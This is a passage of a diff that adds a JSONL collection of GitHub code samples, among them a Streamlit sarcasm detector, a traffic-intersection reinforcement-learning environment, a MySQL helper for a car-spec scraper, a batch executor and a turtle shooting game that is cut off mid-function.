diff --git "a/5319.jsonl" "b/5319.jsonl" new file mode 100644--- /dev/null +++ "b/5319.jsonl" @@ -0,0 +1,518 @@ +{"seq_id":"35607222031","text":"import re\r\nimport os\r\nimport pickle\r\nimport numpy as np\r\nimport streamlit as st\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\r\n\r\n# Function to pre-process text\r\ndef preprocess(phrase): \r\n \r\n phrase = phrase.lower() \r\n phrase = re.sub(r\"won't\", \"will not\", phrase)\r\n phrase = re.sub(r\"can\\'t\", \"can not\", phrase)\r\n phrase = re.sub(r\"n\\'t\", \" not\", phrase)\r\n phrase = re.sub(r\"\\'re\", \" are\", phrase)\r\n phrase = re.sub(r\"\\'s\", \" is\", phrase)\r\n phrase = re.sub(r\"\\'d\", \" would\", phrase)\r\n phrase = re.sub(r\"\\'ll\", \" will\", phrase)\r\n phrase = re.sub(r\"\\'t\", \" not\", phrase)\r\n phrase = re.sub(r\"\\'ve\", \" have\", phrase)\r\n phrase = re.sub(r\"\\'m\", \" am\", phrase)\r\n phrase = re.sub('[^\\w\\s]','', phrase).strip()\r\n\r\n return phrase\r\n\r\n# loading tokenizer object\r\nwith open('tokenizer.pkl', 'rb') as f:\r\n t = pickle.load(f)\r\n \r\n# loading best model\r\nmodel = load_model('bi_lstm_model1.hdf5')\r\n\r\ndef predict(s):\r\n '''This function takes a comment(string) as input and \r\n returns whether the comment is sarcastic or not as output'''\r\n \r\n # Convert input string to list\r\n inp_str = [preprocess(s)]\r\n\r\n # Tokenize input string\r\n encoded_str = t.texts_to_sequences(inp_str)\r\n\r\n # Padding input sequence to have length of 30\r\n padded_str = pad_sequences(encoded_str, maxlen=30, dtype='int32', \r\n padding='post', truncating='post', value=0.0)\r\n \r\n # prediction on padded input sequence\r\n pred = model.predict(padded_str).flatten()[0]\r\n pred_int = np.where(pred >= 0.5, 1, 0).flatten()[0]\r\n\r\n # Output string\r\n if pred_int == 1:\r\n prob = round(pred * 100, 2)\r\n op_str = 'The above comment is sarcastic with {} % confidence'.format(prob) \r\n else:\r\n prob = round((1-pred) * 100, 2)\r\n op_str = 'The above comment is not sarcastic with {} % confidence'.format(prob)\r\n \r\n return op_str\r\n\r\ndef main():\r\n st.set_page_config(page_title=\"SARCASM DETECTION\", \r\n page_icon=\":robot_face:\",\r\n layout=\"wide\",\r\n )\r\n st.markdown(\"

Sarcasm Detection with NLP 🤖

\", unsafe_allow_html=True)\r\n st.text('')\r\n st.markdown(f'

Detect Sarcasm

', unsafe_allow_html=True)\r\n st.text('')\r\n input_text = st.text_area(\"Enter text and click on Predict to know if it's sarcastic\", max_chars=500, height=150)\r\n if st.button(\"Predict\"):\r\n output = predict(input_text)\r\n st.write(output)\r\n \r\nif __name__=='__main__':\r\n main()\r\n\r\n ","repo_name":"sumeetshahu/Sarcasm_Detection","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32889681717","text":"\nfrom Car import Car\nfrom Road import Road\nimport numpy as np\n\n\n\nclass Intersection:\n\n\tdef __init__(self, length, prob, keepalive, wait_weight):\n\t\tself.NSRoad = Road(length,prob)\n\t\tself.EWRoad = Road(length,prob)\n\t\tself.keepalive = keepalive\n\t\tself.total_reward = 0\n\t\tself.length = length\n\t\tself.prob = prob\n\t\tself.end = False\n\t\tself.wait_weight = wait_weight\n\n\tdef getState(self):\n\t\ttemp = np.array([np.array(self.NSRoad.binaryRepresentation()), np.array(self.EWRoad.binaryRepresentation())])\n\t\treturn temp\n\n\tdef newInstance(self):\n\t\tself.NSRoad = Road(self.length, self.prob)\n\t\tself.EWRoad = Road(self.length, self.prob)\n\t\tself.end = False\n\t\tself.total_reward = 0\n\n\tdef getReward(self):\n\t\treturn self.total_reward\n\n\tdef gameEnd(self):\n\t\treturn self.end\n\n\tdef step(self,NS_action, EW_action):\n\t\tNSoutput = self.NSRoad.step(NS_action)\n\t\tEWoutput = self.EWRoad.step(EW_action)\n\t\tstep_reward = 0\n\n\t\tif (NSoutput[1][0] == 1) and (EWoutput[1][0] == 1):\n\t\t\tself.NSRoad.crash()\n\t\t\tself.EWRoad.crash()\n\t\t\tself.total_reward -= 100\n\t\t\tself.end = True\n\t\t\treturn -100\n\n\t\tif (NSoutput[0][0] == 1):\n\t\t\tstep_reward += 15\n\n\t\tif (EWoutput[0][0] == 1):\n\t\t\tstep_reward += 15\n\n\t\twait_penalty = self.wait_weight * (self.NSRoad.totalWait() + self.EWRoad.totalWait())\n\n\t\tstep_reward += (self.keepalive - wait_penalty)\n\t\tself.total_reward += step_reward\n\t\treturn step_reward\n\n","repo_name":"ataozhou/Traffic_Controller","sub_path":"Intersection.py","file_name":"Intersection.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6143955907","text":"from aiohttp import web\nfrom repository import get_documents, get_document\nfrom service import create_document_view_model\n\nasync def index(request):\n return web.Response(text='Hello Aiohttp!')\n\n\nasync def documents(request):\n pagesize = int(request.app['config']['api']['page_size'])\n\n dataset = request.match_info['dataset']\n page = int(request.query.get('page', 0))\n\n start, end = get_bounds(page, pagesize)\n documents = await get_documents(request, dataset, start, end)\n\n documents = [\n {\n 'id': document['id'],\n 'headline': document['headline'],\n 'text': document['lead'] if document['lead'] else document['text'],\n }\n for document in documents\n ]\n\n return web.json_response(documents)\n\n\nasync def document(request):\n dataset = request.match_info['dataset']\n document_id = int(request.match_info['id'])\n document = await get_document(request, dataset, document_id)\n view_model = create_document_view_model(document)\n return web.json_response(view_model)\n\ndef get_bounds(page, pagesize):\n start = page*pagesize\n end = start + pagesize\n\n return start, 
end","repo_name":"Nadja-K/keyphrase-extraction---Group-Project","sub_path":"server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1913247645","text":"#!/usr/bin/env python3\nfrom collections import OrderedDict\n\n# primitive interaction --> valence\nprimitive_interactions = OrderedDict([\n (('e1', 'r1'), -1),\n (('e1', 'r2'), +1),\n (('e2', 'r1'), -1),\n (('e2', 'r2'), +1),\n ])\nprimitive_experiments = ['e1', 'e2']\n\nclass CompositeInteraction(tuple):\n \"an interaction of the form (preInteraction, postInteraction)\"\n pass # it's just a tuple\n\ndef getValence(interaction):\n if isinstance(interaction, CompositeInteraction):\n pre, post = interaction\n return getValence(pre) + getValence(post)\n else:\n experiment, result = interaction\n if interaction not in primitive_interactions:\n return getValence(result)\n else:\n return primitive_interactions[interaction]\n\nlearned = OrderedDict() # compositeInteraction --> weight\ndef learn(pre, post):\n ci = CompositeInteraction((pre, post))\n learned[ci] = learned.get(ci, 0) + 1\n print('learned', pretty(ci), 'valence', getValence(ci), 'weight', learned[ci])\n\ndef anticipate(context):\n anticipations = OrderedDict() # experiment --> proclivity\n for e in primitive_experiments:\n anticipations[e] = 0\n\n for (pre, post), weight in learned.items():\n if pre in context:\n proclivity = weight * getValence(post)\n if isinstance(post, CompositeInteraction):\n experiment = post # propose to re-enact the whole thing\n else:\n experiment = post[0] # it's an (experiment, result) interaction\n anticipations[experiment] = anticipations.get(experiment, 0) + proclivity\n return anticipations\n\ndef selectExperiment(anticipations):\n l = list(anticipations.items())\n l.sort(key=lambda x: -x[1]) # sort by decreasing proclivity\n for experiment, proclivity in l:\n print('propose', pretty(experiment), 'proclivity', proclivity)\n return l[0][0] # pick experiment with highest proclivity\n\ndef enact(interaction):\n if isinstance(interaction, CompositeInteraction):\n pre, post = interaction\n enacted = enact(pre)\n if enacted != pre:\n return enacted\n else:\n return CompositeInteraction((pre, enact(post)))\n else:\n experiment, result = interaction\n if experiment in primitive_experiments:\n result = environmentGetResult(experiment)\n else:\n result = enact(experiment)\n return (experiment, result)\n\n# this is Environment040\nenvHist = [None, None]\ndef environmentGetResult(experiment):\n result = 'r1'\n if envHist[-2] != experiment and envHist[-1] == experiment:\n result = 'r2'\n envHist.append(experiment)\n return result\n\ndef run():\n hist = [None, None] # history of enacted interactions\n for cycle in range(30):\n context = [] # interactions that are considered \"previous\"\n if hist[-1]:\n context.append(hist[-1])\n if isinstance(hist[-1], CompositeInteraction):\n pre, post = hist[-1]\n context.append(post)\n if hist[-1] and hist[-2]:\n context.append(CompositeInteraction((hist[-2], hist[-1])))\n print('context', [pretty(i) for i in context])\n\n anticipations = anticipate(context)\n experiment = selectExperiment(anticipations)\n print('attempt', pretty(experiment))\n if isinstance(experiment, CompositeInteraction):\n intendedInteraction = experiment\n else:\n intendedInteraction = (experiment, None)\n enacted = enact(intendedInteraction)\n print('enacted', pretty(enacted), 'valence', getValence(enacted))\n\n if 
enacted != intendedInteraction and isinstance(experiment, CompositeInteraction):\n # execution of composite interaction failed\n enacted = (experiment, enacted) # 'enacted' is the result\n print('enacted really', pretty(enacted))\n\n if hist[-1]:\n learn(hist[-1], enacted)\n if hist[-1] and hist[-2]:\n learn(hist[-2], CompositeInteraction((hist[-1], enacted)))\n learn(CompositeInteraction((hist[-2], hist[-1])), enacted)\n hist.append(enacted)\n\n if getValence(enacted) >= 0:\n mood = 'pleased'\n else:\n mood = 'pained'\n\n print('===', cycle, pretty(enacted), mood)\n\ndef pretty(thing):\n if isinstance(thing, str):\n return thing\n a, b = thing\n if isinstance(thing, CompositeInteraction):\n return '<' + pretty(a) + pretty(b) + '>'\n if thing in primitive_interactions:\n return pretty(a) + pretty(b)\n return ('(' + pretty(a) + '|' + pretty(b) + ')').upper()\n\nrun()\n","repo_name":"martinxyz/ideal-mooc","sub_path":"Existence040.py","file_name":"Existence040.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"22925093200","text":"from Advanced.Finals_Advanced.VKinder_methods import VKinder\r\nfrom Advanced.Finals_Advanced.mongo_handler import Mongo\r\nfrom pprint import pprint\r\nimport json\r\nfrom Advanced.Finals_Advanced.constants import *\r\nfrom copy import deepcopy\r\n\r\n\r\nclass VKinder_search:\r\n\r\n def __init__(self):\r\n self.instance = VKinder()\r\n self.user = self.instance.get_user()\r\n self.base = Mongo('VKinder')\r\n self.collection = self.base.new_collection(self.user)\r\n self.page = 0\r\n self.full_list = self.search_matches()\r\n\r\n def search_matches(self):\r\n '''\r\n Ищет варианты совпадений\r\n :return: dict\r\n '''\r\n results = self.instance.search()\r\n final_res = self.instance.save_search_results(results)\r\n return final_res\r\n\r\n def search_first_page(self):\r\n '''\r\n Возвращает топ 10 пользователей при первом поиске\r\n :return:\r\n '''\r\n clear_matches_to_base = self.instance.show_10(self.full_list, page=self.page)\r\n while self.check_matches_in_base(clear_matches_to_base) == True:\r\n self.page += 10\r\n clear_matches_to_base = self.instance.show_10(self.full_list, page=self.page)\r\n print(clear_matches_to_base)\r\n copy_to_base = deepcopy(clear_matches_to_base)\r\n self.show_result_and_write_to_base(copy_to_base)\r\n return clear_matches_to_base\r\n\r\n def search_next_page(self):\r\n '''\r\n Возвращает ТОП 10 при последующих поисках\r\n :return:\r\n '''\r\n if self.page < len(self.full_list) // 10:\r\n self.page += 10\r\n else:\r\n print('Вы достигли конца списка')\r\n clear_matches_to_base = self.instance.show_10(self.full_list, page=self.page)\r\n copy_to_base = deepcopy(clear_matches_to_base)\r\n self.show_result_and_write_to_base(copy_to_base)\r\n return clear_matches_to_base\r\n\r\n # def send_list_to_base(self, list_to_base):\r\n # self.show_result_and_write_to_base(copy_to_base)\r\n\r\n def show_result_and_write_to_base(self, result):\r\n '''\r\n Выводит результат, отправляет копию в базу\r\n :param result:\r\n :return:\r\n '''\r\n print(SEPARATOR)\r\n print('Результат поиска')\r\n pprint(result)\r\n if not self.check_matches_in_base(result):\r\n self.base.add_to_base(result, self.collection)\r\n return None\r\n\r\n def save_result_to_file(self, info_to_save):\r\n '''\r\n Получает на вход список словарей, кодирует в json, пишет в файл\r\n :param info_to_save: list of dicts\r\n :return:\r\n '''\r\n filename = 
f'Search_{self.user}_page_{self.page // 10}.json'\r\n with open(filename, 'w', encoding='utf-8') as file:\r\n json.dump(info_to_save, file)\r\n print(f'Файл {filename} успешно сохранен')\r\n return True\r\n\r\n def check_matches_in_base(self, search_list_of_dicts):\r\n to_check = search_list_of_dicts\r\n in_base = self.base.find_by_id_in_base(str(self.user))\r\n to_check_set = set()\r\n for i in to_check:\r\n to_check_set.update(i.keys())\r\n id_check = to_check_set - in_base\r\n if len(id_check) > 0:\r\n return False\r\n else:\r\n return True\r\n\r\n def start(self):\r\n '''\r\n UI ;)\r\n :return:\r\n '''\r\n print('Идет поиск')\r\n quit_program = False\r\n result = self.search_first_page()\r\n while not quit_program:\r\n user_input = input(MENU_TEXT_MAIN)\r\n if user_input in ACCEPTABLE_ANSWERS:\r\n if user_input == '1':\r\n self.save_result_to_file(result)\r\n if user_input == '2':\r\n result = self.search_next_page()\r\n if user_input == 'quit':\r\n break\r\n else:\r\n print('НЕВЕРНЫЙ ВВОД')\r\n print('Программа завершена')","repo_name":"evgeniyism/hw_dev","sub_path":"Finals/VKinder_manager.py","file_name":"VKinder_manager.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21208085116","text":"import queue\nfrom concurrent.futures import Future\nfrom queue import Queue\nfrom threading import Thread\nfrom typing import Any, Callable, Iterable, List, NamedTuple, Optional\n\nfrom vcap import deprecated\n\n\nclass _Request(NamedTuple):\n \"\"\"Used by BatchExecutor to keep track of requests and their respective\n future objects.\n \"\"\"\n\n future: Future\n \"\"\"The Future object for the BatchExecutor to return the output\"\"\"\n\n input_data: Any\n \"\"\"A unit of input data expected by the batch_fn.\"\"\"\n\n\nclass BatchExecutor:\n \"\"\"Feeds jobs into batch_fn in batches, returns results through Futures.\n\n This class simplifies centralizing work from a multitude of sources and\n running that work in a batched predict function, then returning that\n work to the respective Futures.\n \"\"\"\n\n def __init__(self,\n batch_fn: Callable[[List[Any]], Iterable[Any]],\n max_batch_size=40,\n num_workers: int = 1):\n \"\"\"Initialize a new BatchExecutor\n\n :param batch_fn: A function that takes in a list of inputs and iterates\n the outputs in the same order as the inputs.\n :param max_batch_size: The maximum length of list to feed to batch_fn\n :param num_workers: How many workers should be calling batch_fn\n \"\"\"\n self.batch_fn = batch_fn\n self.max_batch_size = max_batch_size\n self._request_queue: Queue[_Request] = Queue()\n self.workers = [Thread(target=self._worker,\n daemon=True,\n name=\"BatchExecutorThread\")\n for _ in range(num_workers)]\n\n # The number of images currently in the work queue or being processed\n self._num_imgs_being_processed: int = 0\n\n self._running: bool = True\n\n for worker in self.workers:\n worker.start()\n\n @property\n def total_imgs_in_pipeline(self) -> int:\n return self._request_queue.qsize() + self._num_imgs_being_processed\n\n def submit(self, input_data: Any, future: Future = None) -> Future:\n \"\"\"Submits a job and returns a Future that will be fulfilled later.\"\"\"\n future = future or Future()\n\n self._request_queue.put(_Request(\n future=future,\n input_data=input_data))\n return future\n\n def _on_requests_ready(self, batch: List[_Request]) -> None:\n \"\"\"Push inputs through the given prediction backend\n\n :param batch: A list 
of requests to work on\n \"\"\"\n # Extract the futures from the requests\n inputs: List[Any] = [req.input_data for req in batch]\n futures: List[Future] = [req.future for req in batch]\n\n # Route the results to each request\n try:\n for prediction in self.batch_fn(inputs):\n # Popping the futures ensures that if an error occurs, only\n # the futures that haven't had a result set will have\n # set_exception called\n futures.pop(0).set_result(prediction)\n except BaseException as exc:\n # Catch exceptions and pass them to the futures, similar to the\n # ThreadPoolExecutor implementation:\n # https://github.com/python/cpython/blob/91e93794/Lib/concurrent/futures/thread.py#L51\n for future in futures:\n future.set_exception(exc)\n\n def _worker(self):\n self._running = True\n\n while self._running:\n # Get a new batch\n batch = self._get_next_batch()\n\n # If no batch was able to be retrieved, restart the loop\n if batch is None:\n continue\n\n # Check to make sure the thread isn't trying to end\n if not self._running:\n break\n\n self._num_imgs_being_processed += len(batch)\n self._on_requests_ready(batch)\n self._num_imgs_being_processed -= len(batch)\n\n self._running = False\n\n def _get_next_batch(self) -> Optional[List[_Request]]:\n \"\"\"A helper function to help make the main thread loop more readable\n :returns: A non-empty list of collected items, or None if the worker is\n no longer running (i.e. self._continue == False)\n \"\"\"\n batch: List[_Request] = []\n while len(batch) < self.max_batch_size:\n # Check if there's a new request\n try:\n # Try to get a new request. Have a timeout to check if closing\n new_request = self._request_queue.get(timeout=.1)\n except queue.Empty:\n # If the thread is being requested to close, exit early\n if not self._running:\n return None\n\n # Wait for requests again\n continue\n\n batch.append(new_request)\n\n # If the request queue is now empty, let worker run everything in\n # the batch\n if self._request_queue.empty():\n break\n\n return batch\n\n def close(self) -> None:\n \"\"\"Stop the BatchExecutor gracefully.\"\"\"\n self._running = False\n for worker in self.workers:\n worker.join()\n","repo_name":"opencv/open_vision_capsules","sub_path":"vcap/vcap/batch_executor.py","file_name":"batch_executor.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"52"} +{"seq_id":"23363046632","text":"import emoji\r\n\r\nsoma = 0\r\ncont = 0\r\nfor c in range (1, 501, 2):\r\n if c % 3 == 0:\r\n cont += 1\r\n soma += c # += é ele recebe ele + ...\r\nprint('A Soma de todos os {} valores solicitados é de {}' .format(cont, soma))\r\nprint(emoji.emojize(':fox:'))\r\n","repo_name":"MatsonMatson/Python","sub_path":"ex048.py","file_name":"ex048.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72879404004","text":"number = int(input())\nnumber = number >> 1\nnum_one_pos = number & 1\nprint(num_one_pos)\n\n# Looking for the bit in position one.\n# We move the bit to the right once with the >> operator\n# Then we use a mask 1 and the & operator to find out what bit it is there\n# 0 & 0 == 0, 0 & 1 == 0, 1 & 1 == 
1\n\n","repo_name":"Dan-Mihaylov/Software-Uni-Courses","sub_path":"Fundamentals/bitwise_operations_lab/02_bit_at_position_one.py","file_name":"02_bit_at_position_one.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"716824335","text":"\nimport pymysql,timeit\nclass MySqlUtils(object):\n errorModel = \"{count:%s,class:%s,method:%s,errorInfo:%s}\"\n errorCount=0\n vcar_host=\"10.1.11.129\"\n var_password='12345'\n #获取数据库链接\n @classmethod\n def getConnection(cls):\n conn = pymysql.connect(host='localhost', user='root', passwd='root', db='vcar_vcyber_com', port=3306, charset='utf8')\n return conn\n\n @classmethod\n def queryBrandId(cls):\n #self.log(\"start query --------------------------------\")\n queryList=list()\n try:\n conn = cls.getConnection()\n cur = conn.cursor()\n sql=\"\"\"\n SELECT `vcar_pinpai`.`pinpaiID`\n FROM `vcar_vcyber_com`.`vcar_pinpai`;\n \"\"\"\n cur.execute(sql)\n res=cur.fetchall()\n #for item in res:\n #print(item)\n #self.log(item)\n #返回的是列表,列表元素类型是元组[(),(),,]\n return res\n\n except Exception as e:\n pass\n #print(e)\n #self.log(e)\n #self.log(\"查询失败\")\n finally:\n cur.close()\n conn.close()\n #self.log(\"end query ----------------------------------\")\n\n\n #查询车系信息,返回元组(brandId,seriesId,seriesLink)\n @classmethod\n def querySeriesLink(cls):\n sql=\"\"\"\n SELECT \n `vcar_chexi`.`pinpaiID`,\n `vcar_chexi`.`chexiID`,\n `vcar_chexi`.`url`\n FROM `vcar_vcyber_com`.`vcar_chexi`;\n \"\"\"\n try:\n #获取数据连接\n conn=cls.getConnection()\n #获取查询游标\n cursor=conn.cursor()\n #执行查询\n cursor.execute(sql)\n #获取结果\n res=cursor.fetchall()\n #for item in res:\n # print(item)\n return res\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n # 查询车型链接信息\n @classmethod\n def querySpecLink(self):\n sql = \"\"\"\n SELECT `vcar_chexing`.`chexingID`,\n `vcar_chexing`.`pinpaiID`,\n `vcar_chexing`.`chexiID`,\n `vcar_chexing`.`name`,\n `vcar_chexing`.`url`\n FROM `vcar_vcyber_com`.`vcar_chexing`;\n \"\"\"\n try:\n conn = self.getConnection()\n cursor = conn.cursor()\n cursor.execute(sql)\n res = cursor.fetchall()\n # for item in res:\n # print(item)\n return res\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n\n #返回一个以属性id为key,属性名为value的字典\n @classmethod\n def queryShuxing(cls):\n sql=\"\"\"\n SELECT `vcar_shuxing`.`shuxingID`,\n `vcar_shuxing`.`name`\n FROM `vcar_vcyber_com`.`vcar_shuxing`;\n \"\"\"\n try:\n if id:\n conn=cls.getConnection()\n cursor=conn.cursor()\n cursor.execute(sql)\n res=cursor.fetchall()\n #转为Dic数据类型\n shuxingDic=dict()\n for item in res:\n shuxingDic.setdefault(item[1],item[0])\n return shuxingDic\n else:\n return None\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n\n # 查询属性类型表返回以属性名作为key,属性id为value的字典\n @classmethod\n def queryShuxingType(cls):\n sql=\"\"\"\n SELECT \n `vcar_shuxingtype`.`name`,\n `vcar_shuxingtype`.`shuxingTypeID`\n FROM `vcar_vcyber_com`.`vcar_shuxingtype`;\n \"\"\"\n try:\n conn=cls.getConnection()\n cursor=conn.cursor()\n cursor.execute(sql)\n res=cursor.fetchall()\n #转Dict数据类型\n typeDict=dict()\n for item in res:\n typeDict.setdefault(item[0],item[1])\n return typeDict\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n # 查询属性type下的属性集合{shuxingType:{shuxingName:shuxingValue,,,},,,}\n @classmethod\n def queryTypeShuxingDic(cls):\n typeDic=cls.queryShuxingType()\n sql=\"\"\"\n SELECT `vcar_shuxing`.`shuxingID`,\n 
`vcar_shuxing`.`name`\n FROM `vcar_vcyber_com`.`vcar_shuxing` \n where shuxingTypeID=%s \n \"\"\"\n typeShuxingDic=dict()\n try:\n conn = cls.getConnection()\n cursor = conn.cursor()\n for key in typeDic.keys():\n typeId=typeDic.get(key)\n cursor.execute(sql,typeId)\n res=cursor.fetchall()\n shuxingDic=dict()\n for item in res:\n shuxingDic.setdefault(item[1],item[0])\n typeShuxingDic.setdefault(key,shuxingDic)\n return typeShuxingDic\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n # 插入到属性表\n @classmethod\n def insertIntoShuxing(cls,params):\n sql=\"\"\"\n INSERT INTO `vcar_vcyber_com`.`vcar_shuxing`\n (`shuxingID`,\n `shuxingTypeID`,\n `name`)\n VALUES\n (%s,\n %s,\n %s);\n \"\"\"\n try:\n conn=cls.getConnection()\n cursor=conn.cursor()\n res=cursor.executemany(sql, params)\n conn.commit()\n return res\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n\n @classmethod\n def queryChexingShuxingById(cls,id):\n startTime=timeit.default_timer()\n sql=\"\"\"\n SELECT \n `vcar_chexingshuxing`.`chexingID`\n FROM `vcar_vcyber_com`.`vcar_chexingshuxing`\n where chexingID=%s;\n \"\"\"\n try:\n conn=cls.getConnection()\n cursor=conn.cursor()\n cursor.execute(sql,id)\n res=cursor.fetchone()\n endTime=timeit.default_timer()\n print(\"queryIsInsertCastTime------------------->: %s\" % str(endTime-startTime))\n if res:\n return True\n else:\n return False\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n @classmethod\n def insertOneShuxing(cls,params):\n sql=\"\"\"\n INSERT INTO `vcar_vcyber_com`.`vcar_shuxing`\n (`shuxingID`,\n `shuxingTypeID`,\n `name`)\n VALUES\n (%s,\n %s,\n %s);\n \"\"\"\n try:\n conn=cls.getConnection()\n cursor=conn.cursor()\n i=cursor.execute(sql, params)\n conn.commit()\n return i\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n #向车型属性表中插入数据\n @classmethod\n def insertChexingShuxing(cls, paramsList):\n startTime=timeit.default_timer()\n sql=\"\"\"\n INSERT INTO \n `vcar_vcyber_com`.`vcar_chexingshuxing`\n (`chexingshuxingID`,\n `chexingID`,\n `shuxingID`,\n `shuxingName`,\n `shuxingValue`)\n VALUES\n (%s,\n %s,\n %s,\n %s,\n %s);\n \"\"\"\n try:\n conn = cls.getConnection()\n cursor = conn.cursor()\n #print(paramsList)\n res =cursor.executemany(sql,paramsList)\n conn.commit()\n endTime = timeit.default_timer()\n print(\"insertChexingShuxingCastTime------------------------>:%s\" % str(endTime-startTime))\n except Exception as e:\n print(e)\n cls.errorCount+=1\n filename = \"/Users/guohan/DeskTop/mySqlError.txt\"\n error=cls.errorModel % (cls.errorCount,\"MySqlUtils\",\"insertChexingShuxing\",str(e))\n with open(filename, 'a') as f: # 'a'表示append,即在原来文件内容后继续写数据(不清楚原有数据)\n f.write(error)\n f.flush()\n f.close()\n finally:\n conn.close()\n cursor.close()\n\n\n # 查询已爬取过配置的车型id\n @classmethod\n def queryExistChexingId(cls):\n sql=\"\"\" \n SELECT distinct(t.chexingID) \n FROM vcar_vcyber_com.vcar_chexingshuxing t \n \"\"\"\n try:\n # 获取数据连接\n conn = cls.getConnection()\n # 获取查询游标\n cursor = conn.cursor()\n # 执行\n # print(itemList)\n cursor.execute(sql)\n # 提交\n conn.commit()\n res=cursor.fetchall()\n return res\n except Exception as e:\n print(e)\n finally:\n cursor.close()\n conn.close()\n\n # 将上一个查询车型id方法返回值转换为list\n @classmethod\n def parseChexingIdTupeListToSet(cls,res):\n chexingIdSet=set()\n for item in res:\n chexingIdSet.add(item[0])\n print(chexingIdSet)\n \n \n \n#\n# my = MySqlUtils()\n# res=my.queryExistChexingId()\n# my.parseChexingIdTupeListToSet(res)\n# 
name=\"基本参数\"\n# typeDict=my.queryShuxingType()\n# keys=typeDict.keys()\n# # for key in keys:\n# # print(key,typeDict[key])\n# shuxingDict=my.queryShuxing()\n# shuxingKeys=shuxingDict.keys()\n# for key in shuxingKeys:\n# print(key,shuxingDict[key])\n# typeDic=MySqlUtils.queryShuxingType()\n# print(typeDic)\n# print(MySqlUtils.queryTypeShuxingDic())\n","repo_name":"guohan168/spider","sub_path":"vcarConfigSpider/mySqlUtils.py","file_name":"mySqlUtils.py","file_ext":"py","file_size_in_byte":10388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33371665155","text":"import turtle\nimport math\nimport time\n\n#Boundary\nBoundary = turtle.Turtle()\nBoundary.penup()\nBoundary.pensize(20)\nBoundary.speed(0)\nBoundary.goto(-450, -300)\nBoundary.color(\"white\")\nBoundary.pendown()\nBoundary.forward(900)\nBoundary.left(90)\nBoundary.forward(600)\nBoundary.left(90)\nBoundary.forward(900)\nBoundary.left(90)\nBoundary.forward(600)\n\n\n#Screen size and color\nwindow = turtle.Screen()\nwindow.bgcolor(\"black\")\nwindow.setup(width=900, height=500)\nwindow.tracer(0)\n\n#Score\nscore_1 = -1\nscore_2 = -1\n\n\n#The first player\nplayer_1 = turtle.Turtle()\nplayer_1.speed(0)\nplayer_1.shape(\"square\")\nplayer_1.color(\"yellow\")\nplayer_1.shapesize(stretch_wid=3, stretch_len=1)\nplayer_1.penup()\nplayer_1.goto(-350, 0)\n\n\n#The second player\nplayer_2 = turtle.Turtle()\nplayer_2.speed(0)\nplayer_2.shape(\"square\")\nplayer_2.color(\"green\")\nplayer_2.shapesize(stretch_wid=3, stretch_len=1)\nplayer_2.penup()\nplayer_2.goto(350, 0)\n\n#Bullet player 1\nbullet = turtle.Turtle()\nbullet.color(\"yellow\")\nbullet.shape(\"circle\")\nbullet.penup()\nbullet.speed(0)\nbullet.setheading(90)\nbullet.shapesize(0.5, 0.5)\nbullet.hideturtle()\n\nbulletspeed = 40\n\n\n#ready - ready to fire\n#fire - bullet is firing\nbulletcondition = \"ready to shoot\"\n\n#Bullet for player 2\nbullet_2 = turtle.Turtle()\nbullet_2.color(\"green\")\nbullet_2.shape(\"circle\")\nbullet_2.penup()\nbullet_2.speed(0)\nbullet_2.setheading(90)\nbullet_2.shapesize(0.5, 0.5)\nbullet_2.hideturtle()\n\nbullet_2speed = -40\nbullet_2condition = \"ready to shoot\"\n\n#Scoring system\nscore = turtle.Turtle()\nscore.speed(0)\nscore.color(\"white\")\nscore.penup()\nscore.hideturtle()\nscore.goto(0, 250)\nscore.write(\"Player 1: 0 Player 2: 0\", align = \"center\", font = (\"Impact\", 28, \"normal\"))\n\n#Movement of the first player\ndef player_1_up():\n y = player_1.ycor()\n y += 50\n player_1.sety(y)\n\ndef player_1_down():\n y = player_1.ycor()\n y -= 50\n player_1.sety(y)\n\n#Movement of the second player\ndef player_2_up():\n y = player_2.ycor()\n y += 50\n player_2.sety(y)\n\ndef player_2_down():\n y = player_2.ycor()\n y -= 50\n player_2.sety(y)\n\n#Defining firing the bullet\ndef shoot_bullet():\n #Declare bullet as a global if it needs to change\n global bulletcondition\n if bulletcondition == \"ready to shoot\":\n bulletcondition = \"shoot\"\n #Move the bullet to the right\n x = player_1.xcor() + 10\n y = player_1.ycor()\n bullet.setposition(x, y)\n bullet.showturtle()\n\ndef shoot_bullet_2():\n global bullet_2condition\n if bullet_2condition == \"ready to shoot\":\n bullet_2condition = \"shoot\"\n #Move bullet 2\n x = player_2.xcor() \n y = player_2.ycor()\n bullet_2.setposition(x-10, y)\n bullet_2.showturtle()\n\ndef bulletCollision(p1, p2):\n distance = math.sqrt(math.pow(p2.xcor()-p1.xcor(),2)) + 